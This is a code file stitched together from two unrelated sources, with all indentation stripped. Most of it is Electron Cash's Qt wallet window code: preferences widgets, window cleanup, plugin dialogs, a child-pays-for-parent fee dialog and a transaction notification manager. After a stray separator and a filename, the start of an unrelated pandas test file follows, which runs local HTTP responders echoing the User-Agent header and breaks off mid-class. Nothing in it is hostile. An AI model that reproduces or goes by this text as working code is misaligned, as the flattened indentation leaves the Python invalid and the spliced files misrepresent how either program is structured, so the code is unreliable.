qr_combo.addItem(_("Default"), "default")
qr_label.setText(_('Video device') + ':')
qr_label.help_text = _("For scanning QR codes.")
qr_combo.setToolTip(qr_label.help_text)
qr_label.setToolTip(qr_label.help_text)
for cam in system_cameras:
qr_combo.addItem(cam.description(), cam.deviceName())
video_device = self.config.get("video_device")
video_device_index = 0
if video_device:
video_device_index = max(0, qr_combo.findData(video_device)) # if not found, default to 0 (the default item)
qr_combo.setCurrentIndex(video_device_index)
qr_combo.setEnabled(True)
def on_video_device(x):
if qr_combo.isEnabled():
self.config.set_key("video_device", qr_combo.itemData(x), True)
set_no_camera() # pre-populate combo box with default so it has a sizeHint
d.shown_signal.connect(scan_cameras, Qt.QueuedConnection) # do the camera scan once dialog is shown, using QueuedConnection so it's called from top level event loop and not from the showEvent handler
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Default'), 'default') # We can't name this "light" in the UI as sometimes the default is actually dark-looking eg on Mojave or on some Linux desktops.
colortheme_combo.addItem(_('Dark'), 'dark')
theme_name = self.config.get('qt_gui_color_theme', 'default')
dark_theme_available = self.gui_object.is_dark_theme_available()
if theme_name == 'dark' and not dark_theme_available:
theme_name = 'default'
index = colortheme_combo.findData(theme_name)
if index < 0: index = 0
colortheme_combo.setCurrentIndex(index)
msg = ( _("Dark theme support requires the package 'QDarkStyle' (typically installed via the 'pip3' command on Unix & macOS).")
if not dark_theme_available
else '' )
lbltxt = _('Color theme') + ':'
colortheme_label = HelpLabel(lbltxt, msg) if msg else QLabel(lbltxt)
def on_colortheme(x):
item_data = colortheme_combo.itemData(x)
if not dark_theme_available and item_data == 'dark':
self.show_error(_("Dark theme is not available. Please install QDarkStyle to access this feature."))
colortheme_combo.setCurrentIndex(0)
return
self.config.set_key('qt_gui_color_theme', item_data, True)
if theme_name != item_data:
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
if sys.platform not in ('darwin',):
# Enable/Disable HighDPI -- this option makes no sense for macOS
# and thus does not appear on that platform
hidpi_chk = QCheckBox(_('Automatic high-DPI scaling'))
if sys.platform in ('linux',):
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as overly large status bar icons)"))
else: # windows
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as dialog box text being cut off"))
hidpi_chk.setChecked(bool(self.config.get('qt_enable_highdpi', True)))
if self.config.get('qt_disable_highdpi'):
hidpi_chk.setToolTip(_('Automatic high DPI scaling was disabled from the command-line'))
hidpi_chk.setChecked(False)
hidpi_chk.setDisabled(True)
def on_hi_dpi_toggle():
self.config.set_key('qt_enable_highdpi', hidpi_chk.isChecked())
self.need_restart = True
hidpi_chk.stateChanged.connect(on_hi_dpi_toggle)
gui_widgets.append((hidpi_chk, None))
if sys.platform in ('win32', 'cygwin'):
# Enable/Disable the use of the FreeType library on Qt
# (Windows only)
freetype_chk = QCheckBox(_('Use FreeType for font rendering'))
freetype_chk.setChecked(self.gui_object.windows_qt_use_freetype)
freetype_chk.setEnabled(self.config.is_modifiable('windows_qt_use_freetype'))
freetype_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_freetype_chk():
self.gui_object.windows_qt_use_freetype = freetype_chk.isChecked() # property has a method backing it
self.need_restart = True
freetype_chk.stateChanged.connect(on_freetype_chk)
gui_widgets.append((freetype_chk, None))
elif sys.platform in ('linux',):
# Enable/Disable the use of the fonts.xml FontConfig override
# (Linux only)
fontconfig_chk = QCheckBox(_('Use custom fontconfig for emojis'))
fontconfig_chk.setChecked(self.gui_object.linux_qt_use_custom_fontconfig)
fontconfig_chk.setEnabled(self.config.is_modifiable('linux_qt_use_custom_fontconfig'))
fontconfig_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_fontconfig_chk():
self.gui_object.linux_qt_use_custom_fontconfig = fontconfig_chk.isChecked() # property has a method backing it
self.need_restart = True
fontconfig_chk.stateChanged.connect(on_fontconfig_chk)
gui_widgets.append((fontconfig_chk, None))
gui_widgets.append((None, None)) # spacer
updatecheck_cb = QCheckBox(_("Automatically check for updates"))
updatecheck_cb.setChecked(self.gui_object.has_auto_update_check())
updatecheck_cb.setToolTip(_("Enable this option if you wish to be notified as soon as a new version of Electron Cash becomes available"))
def on_set_updatecheck(v):
self.gui_object.set_auto_update_check(v == Qt.Checked)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
notify_tx_cb = QCheckBox(_('Notify when receiving funds'))
notify_tx_cb.setToolTip(_('If enabled, a system notification will be presented when you receive funds to this wallet.'))
notify_tx_cb.setChecked(bool(self.wallet.storage.get('gui_notify_tx', True)))
def on_notify_tx(b):
self.wallet.storage.put('gui_notify_tx', bool(b))
notify_tx_cb.stateChanged.connect(on_notify_tx)
per_wallet_tx_widgets.append((notify_tx_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
if self.force_use_single_change_addr:
usechange_cb.setChecked(True)
usechange_cb.setEnabled(False)
if isinstance(self.force_use_single_change_addr, str):
usechange_cb.setToolTip(self.force_use_single_change_addr)
else:
usechange_cb.setChecked(self.wallet.use_change)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
per_wallet_tx_widgets.append((usechange_cb, None))
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
if self.force_use_single_change_addr:
multiple_cb.setEnabled(False)
multiple_cb.setChecked(False)
if isinstance(self.force_use_single_change_addr, str):
multiple_cb.setToolTip(self.force_use_single_change_addr)
else:
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
                _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_cb.stateChanged.connect(on_multiple)
per_wallet_tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
global_tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(self.on_toggled_opreturn)
global_tx_widgets.append((opret_cb,None))
# Schnorr
use_schnorr_cb = QCheckBox(_("Sign with Schnorr signatures"))
use_schnorr_cb.setChecked(self.wallet.is_schnorr_enabled())
use_schnorr_cb.stateChanged.connect(self.wallet.set_schnorr_enabled)
no_schnorr_reason = []
if self.wallet.is_schnorr_possible(no_schnorr_reason):
use_schnorr_cb.setEnabled(True)
use_schnorr_cb.setToolTip(_("Sign all transactions using Schnorr signatures."))
else:
# not possible (wallet type not supported); show reason in tooltip
use_schnorr_cb.setEnabled(False)
use_schnorr_cb.setToolTip(no_schnorr_reason[0])
per_wallet_tx_widgets.append((use_schnorr_cb, None))
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([pgettext('Referencing Fiat currency', 'None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
c = self.fx.get_currency()
h = self.fx.get_history_config()
else:
c, h = self.fx.default_currency, False
exchanges = self.fx.get_exchanges_by_ccy(c, h)
conf_exchange = self.fx.config_exchange()
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
idx = ex_combo.findText(conf_exchange) # try and restore previous exchange if in new list
if idx < 0:
# hmm, previous exchange wasn't in new h= setting. Try default exchange.
idx = ex_combo.findText(self.fx.default_exchange)
idx = 0 if idx < 0 else idx # if still no success (idx < 0) -> default to the first exchange in combo
if exchanges: # don't set index if no exchanges, as any index is illegal. this shouldn't happen.
ex_combo.setCurrentIndex(idx) # note this will emit a currentIndexChanged signal if it's changed
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
changed = bool(self.fx.get_history_config()) != bool(checked)
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
self.slp_history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
if changed:
self.history_list.update() # this won't happen too often as it's rate-limited
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
hist_checkbox.setText(_('Show history rates'))
fiat_address_checkbox.setText(_('Show fiat balance for addresses'))
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency:')), ccy_combo))
fiat_widgets.append((QLabel(_('Source:')), ex_combo))
fiat_widgets.append((hist_checkbox, None))
fiat_widgets.append((fiat_address_checkbox, None))
tabs_info = [
(gui_widgets, _('General')),
(fee_widgets, _('Fees')),
(OrderedDict([
( _("App-Global Options") , global_tx_widgets ),
( _("Per-Wallet Options") , per_wallet_tx_widgets),
]), _('Transactions')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
def add_tabs_info_to_tabs(tabs, tabs_info):
def add_widget_pair(a,b,grid):
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
if a:
grid.addWidget(a, i, 0, 1, 2)
else:
grid.addItem(QSpacerItem(15, 15), i, 0, 1, 2)
for thing, name in tabs_info:
tab = QWidget()
if isinstance(thing, dict):
# This Prefs tab is laid out as groupboxes one atop another...
d = thing
vbox = QVBoxLayout(tab)
for groupName, widgets in d.items():
gbox = QGroupBox(groupName)
grid = QGridLayout(gbox)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
vbox.addWidget(gbox, len(widgets))
else:
# Standard layout.. 1 tab has just a grid of widgets
widgets = thing
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
tabs.addTab(tab, name)
# / add_tabs_info_to_tabs
add_tabs_info_to_tabs(tabs, tabs_info)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
try:
# run the dialog
d.exec_()
finally:
dialog_finished = True # paranoia for scan_cameras
d.setParent(None) # for Python GC
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_message(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice.
# clean_up() guards against that situation.
self.clean_up()
super().closeEvent(event)
event.accept() # paranoia. be sure it's always accepted.
def is_alive(self): return bool(not self.cleaned_up)
def clean_up_connections(self):
def disconnect_signals():
for attr_name in dir(self):
if attr_name.endswith("_signal"):
sig = getattr(self, attr_name)
if isinstance(sig, pyqtBoundSignal):
try: sig.disconnect()
except TypeError: pass # no connections
elif attr_name.endswith("__RateLimiter"): # <--- NB: this needs to match the attribute name in util.py rate_limited decorator
rl_obj = getattr(self, attr_name)
if isinstance(rl_obj, RateLimiter):
rl_obj.kill_timer()
try: self.disconnect()
except TypeError: pass
# Work-around to PyQt bugs. See EC issue #1532
try: self.gui_object.update_available_signal.disconnect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
except TypeError: pass
def disconnect_network_callbacks():
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
# /
disconnect_network_callbacks()
disconnect_signals()
def clean_up_children(self):
# Status bar holds references to self, so clear it to help GC this window
self.setStatusBar(None)
# Note that due to quirks on macOS and the shared menu bar, we do *NOT*
# clear the menuBar. Instead, doing this causes the object to get
# deleted and/or its actions (and more importantly menu action hotkeys)
# to go away immediately.
self.setMenuBar(None)
# Disable shortcuts immediately to prevent them from accidentally firing
# on us after we are closed. They will get deleted when this QObject
# is finally deleted by Qt.
for shortcut in self._shortcuts:
shortcut.setEnabled(False)
del shortcut
self._shortcuts.clear()
# Reparent children to 'None' so python GC can clean them up sooner rather than later.
# This also hopefully helps accelerate this window's GC.
children = [c for c in self.children()
if (isinstance(c, (QWidget, QAction, TaskThread))
and not isinstance(c, (QStatusBar, QMenuBar, QFocusFrame, QShortcut)))]
for c in children:
try: c.disconnect()
except TypeError: pass
c.setParent(None)
def clean_up(self):
if self.cleaned_up:
return
self.cleaned_up = True
if self.wallet.thread: # guard against window close before load_wallet was called (#1554)
self.wallet.thread.stop()
self.wallet.thread.wait() # Join the thread to make sure it's really dead.
if self.wallet.ui_emit_validity_updated:
self.wallet.ui_emit_validity_updated = None # detach callback
self.tx_update_mgr.clean_up() # disconnects some signals
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.qr_window = None # force GC sooner rather than later.
for d in list(self._tx_dialogs):
# clean up all extant tx dialogs we opened as they hold references
# to us that will be invalidated
d.prompt_if_unsaved = False # make sure to unconditionally close
d.close()
for d in list(self._slp_dialogs):
d.close() # make sure dialogs we created are properly closed!
self._close_wallet()
try: self.gui_object.timer.timeout.disconnect(self.timer_actions)
except TypeError: pass # defensive programming: this can happen if we got an exception before the timer action was connected
self.gui_object.close_window(self) # implicitly runs the hook: on_close_window
# Now, actually STOP the wallet's synchronizer and verifiers and remove
# it from the daemon. Note that its addresses will still stay
# 'subscribed' to the ElectrumX server until we connect to a new server,
# (due to ElectrumX protocol limitations).. but this is harmless.
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
# At this point all plugins should have removed any references to this window.
# Now, just to be paranoid, do some active destruction of signal/slot connections as well as
# Removing child widgets forcefully to speed up Python's own GC of this window.
self.clean_up_connections()
self.clean_up_children()
# And finally, print when we are destroyed by C++ for debug purposes
# We must call this here as above calls disconnected all signals
# involving this widget.
destroyed_print_error(self)
def internal_plugins_dialog(self):
if self.internalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.internalpluginsdialog.raise_()
return
d = WindowModalDialog(self.top_level_window(), _('Optional Features'))
weakD = Weak.ref(d)
gui_object = self.gui_object
plugins = gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
weakGrid = Weak.ref(grid)
w.setLayout(grid)
settings_widgets = Weak.ValueDictionary()
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
grid = weakGrid()
d = weakD()
if d and grid and not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
if not p:
# Need to delete settings widget because keeping it around causes bugs as it points to a now-dead plugin instance
settings_widgets.pop(name)
widget.hide(); widget.setParent(None); widget.deleteLater(); widget = None
def do_toggle(weakCb, name, i):
cb = weakCb()
if cb:
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
weakCb = Weak.ref(cb)
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, weakCb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stderr)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
self.internalpluginsdialog = d
d.exec_()
self.internalpluginsdialog = None # Python GC please!
def external_plugins_dialog(self):
if self.externalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.externalpluginsdialog.raise_()
return
from . import external_plugins_window
d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
self.externalpluginsdialog = d
d.exec_()
self.externalpluginsdialog = None # allow python to GC
def hardware_wallet_support(self):
if not sys.platform.startswith('linux'):
self.print_error("FIXME! hardware_wallet_support is Linux only!")
return
if self.hardwarewalletdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.hardwarewalletdialog.raise_()
return
from .udev_installer import InstallHardwareWalletSupportDialog
d = InstallHardwareWalletSupportDialog(self.top_level_window(), self.gui_object.plugins)
self.hardwarewalletdialog = d
d.exec_()
self.hardwarewalletdialog = None # allow python to GC
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self.top_level_window(), _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel(_('{total_size} bytes').format(total_size=total_size)), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
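        # For example (illustrative numbers only): with fee_per_kb() returning
        # 1000 sat/kB and total_size = 450 bytes, the suggested fee is
        # 1000 * 450 / 1000 = 450 sats.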
fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
result = d.exec_()
d.setParent(None) # So Python can GC
if not result:
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
def rebuild_history(self):
if self.gui_object.warn_if_no_network(self):
# Don't allow if offline mode.
return
msg = ' '.join([
_('This feature is intended to allow you to rebuild a wallet if it has become corrupted.'),
"\n\n"+_('Your entire transaction history will be downloaded again from the server and verified from the blockchain.'),
_('Just to be safe, back up your wallet file first!'),
"\n\n"+_("Rebuild this wallet's history now?")
])
if self.question(msg, title=_("Rebuild Wallet History")):
try:
self.wallet.rebuild_history()
except RuntimeError as e:
self.show_error(str(e))
def scan_beyond_gap(self):
if self.gui_object.warn_if_no_network(self):
return
from .scan_beyond_gap import ScanBeyondGap
d = ScanBeyondGap(self)
d.exec_()
d.setParent(None) # help along Python by dropping refct to 0
def copy_to_clipboard(self, text, tooltip=None, widget=None):
tooltip = tooltip or _("Text copied to clipboard")
widget = widget or self
qApp.clipboard().setText(text)
QToolTip.showText(QCursor.pos(), tooltip, widget)
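# The class below collates transaction notifications arriving from the network
# thread and flushes them to the GUI thread on a timer. A minimal sketch of
# that pattern (update_gui/item are placeholder names, not part of this
# module):
#
#   with self.lock:                        # network thread: enqueue and flag
#       self.notif_q.append(item)
#       self.need_process_n = True
#   ...
#   with self.lock:                        # GUI timer: drain in one batch
#       batch, self.notif_q = self.notif_q, []
#       self.need_process_n = False
#   update_gui(batch)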
class TxUpdateMgr(QObject, PrintError):
''' Manages new transaction notifications and transaction verified
notifications from the network thread. It collates them and sends them to
the appropriate GUI controls in the main_window in an efficient manner. '''
def __init__(self, main_window_parent):
assert isinstance(main_window_parent, ElectrumWindow), "TxUpdateMgr must be constructed with an ElectrumWindow as its parent"
super().__init__(main_window_parent)
self.cleaned_up = False
self.lock = threading.Lock() # used to lock thread-shared attrs below
# begin thread-shared attributes
self.notif_q = []
self.verif_q = []
self.need_process_v, self.need_process_n = False, False
# /end thread-shared attributes
self.weakParent = Weak.ref(main_window_parent)
main_window_parent.history_updated_signal.connect(self.verifs_get_and_clear, Qt.DirectConnection) # immediately clear verif_q on history update because it would be redundant to keep the verify queue around after a history list update
main_window_parent.on_timer_signal.connect(self.do_check, Qt.DirectConnection) # hook into main_window's timer_actions function
def diagnostic_name(self):
return ((self.weakParent() and self.weakParent().diagnostic_name()) or "???") + "." + __class__.__name__
def clean_up(self):
self.cleaned_up = True
main_window_parent = self.weakParent() # weak -> strong ref
if main_window_parent:
try: main_window_parent.history_updated_signal.disconnect(self.verifs_get_and_clear)
except TypeError: pass
try: main_window_parent.on_timer_signal.disconnect(self.do_check)
except TypeError: pass
def do_check(self):
''' Called from timer_actions in main_window to check if notifs or
verifs need to update the GUI.
- Checks the need_process_[v|n] flags
- If either flag is set, call the @rate_limited process_verifs
and/or process_notifs functions which update GUI parent in a
rate-limited (collated) fashion (for decent GUI responsiveness). '''
with self.lock:
bV, bN = self.need_process_v, self.need_process_n
self.need_process_v, self.need_process_n = False, False
if bV: self.process_verifs() # rate_limited call (1 per second)
        if bN: self.process_notifs() # rate_limited call (1 per 5 seconds)
def verifs_get_and_clear(self):
''' Clears the verif_q. This is called from the network
thread for the 'verified2' event as well as from the below
update_verifs (GUI thread), hence the lock. '''
with self.lock:
ret = self.verif_q
self.verif_q = []
self.need_process_v = False
return ret
def notifs_get_and_clear(self):
with self.lock:
ret = self.notif_q
self.notif_q = []
self.need_process_n = False
return ret
def verif_add(self, args):
# args: [wallet, tx_hash, height, conf, timestamp]
# filter out tx's not for this wallet
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if args[0] is parent.wallet:
with self.lock:
self.verif_q.append(args[1:])
self.need_process_v = True
def notif_add(self, args):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
tx, wallet = args
# filter out tx's not for this wallet
if wallet is parent.wallet:
with self.lock:
self.notif_q.append(tx)
self.need_process_n = True
@rate_limited(1.0, ts_after=True)
def process_verifs(self):
''' Update history list with tx's from verifs_q, but limit the
GUI update rate to once per second. '''
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
items = self.verifs_get_and_clear()
if items:
t0 = time.time()
parent.history_list.setUpdatesEnabled(False)
parent.slp_history_list.setUpdatesEnabled(False)
had_sorting = [ parent.history_list.isSortingEnabled(),
parent.slp_history_list.isSortingEnabled() ]
if had_sorting[0]:
parent.history_list.setSortingEnabled(False)
if had_sorting[1]:
parent.slp_history_list.setSortingEnabled(False)
n_updates = 0
for item in items:
did_update = parent.history_list.update_item(*item)
parent.slp_history_list.update_item_netupdate(*item)
n_updates += 1 if did_update else 0
self.print_error("Updated {}/{} verified txs in GUI in {:0.2f} ms"
.format(n_updates, len(items), (time.time()-t0)*1e3))
if had_sorting[0]:
parent.history_list.setSortingEnabled(True)
if had_sorting[1]:
parent.slp_history_list.setSortingEnabled(True)
parent.slp_history_list.setUpdatesEnabled(True)
parent.history_list.setUpdatesEnabled(True)
parent.update_status()
@rate_limited(5.0, classlevel=True)
def process_notifs(self):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if parent.network:
n_ok = 0
txns = self.notifs_get_and_clear()
if txns and parent.wallet.storage.get('gui_notify_tx', True):
# Combine the transactions
total_amount = 0
tokens_included = set()
for tx in txns:
if tx:
is_relevant, is_mine, v, fee = parent.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
n_ok += 1
if parent.is_slp_wallet:
try:
tti = parent.wallet.get_slp_token_info(tx.txid())
tokens_included.add(parent.wallet.token_types.get(tti['token_id'],{}).get('name','unknown'))
except KeyError:
pass
if tokens_included:
tokstring = _('. Tokens included: ') + ', '.join(sorted(tokens_included))
else:
tokstring = ''
if total_amount > 0:
self.print_error("Notifying GUI %d tx"%(n_ok))
if n_ok > 1:
parent.notify(_("{} new transactions: {}{}")
.format(n_ok, parent.format_amount_and_units(total_amount, is_diff=True), tokstring))
else:
parent.notify(_("New transaction: {}{}").format(parent.format_amount_and_units(total_amount, is_diff=True), tokstring))
|
test_user_agent.py
|
"""
Tests for the pandas custom headers in http(s) requests
"""
import gzip
import http.server
from io import BytesIO
import threading
import pytest
import pandas.util._test_decorators as td
import pandas as pd
import pandas._testing as tm
class BaseUserAgentResponder(http.server.BaseHTTPRequestHandler):
"""
    Base class for setting up a server that responds with a particular file
    format and the accompanying content-type headers.
    The interfaces of the different IO methods differ enough that using one
    responder subclass per format seemed the cleanest approach.
"""
def start_processing_headers(self):
"""
shared logic at the start of a GET request
"""
self.send_response(200)
self.requested_from_user_agent = self.headers["User-Agent"]
response_df = pd.DataFrame(
{
"header": [self.requested_from_user_agent],
}
)
return response_df
def gzip_bytes(self, response_bytes):
"""
some web servers will send back gzipped files to save bandwidth
"""
bio = BytesIO()
zipper = gzip.GzipFile(fileobj=bio, mode="w")
zipper.write(response_bytes)
zipper.close()
response_bytes = bio.getvalue()
return response_bytes
def write_back_bytes(self, response_bytes):
"""
shared logic at the end of a GET request
"""
self.wfile.write(response_bytes)
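# Each concrete responder below follows the same do_GET shape; this is only an
# orientation sketch (the real handlers differ in Content-Type and in how the
# DataFrame is serialized):
#
#   response_df = self.start_processing_headers()   # send 200, echo User-Agent
#   self.send_header("Content-Type", "<format-specific type>")
#   self.end_headers()
#   self.write_back_bytes(<serialized response_df bytes>)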
class CSVUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "text/csv")
self.end_headers()
response_bytes = response_df.to_csv(index=False).encode("utf-8")
self.write_back_bytes(response_bytes)
class GzippedCSVUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "text/csv")
self.send_header("Content-Encoding", "gzip")
self.end_headers()
response_bytes = response_df.to_csv(index=False).encode("utf-8")
response_bytes = self.gzip_bytes(response_bytes)
self.write_back_bytes(response_bytes)
class JSONUserAgentResponder(BaseUserAgentResponder):
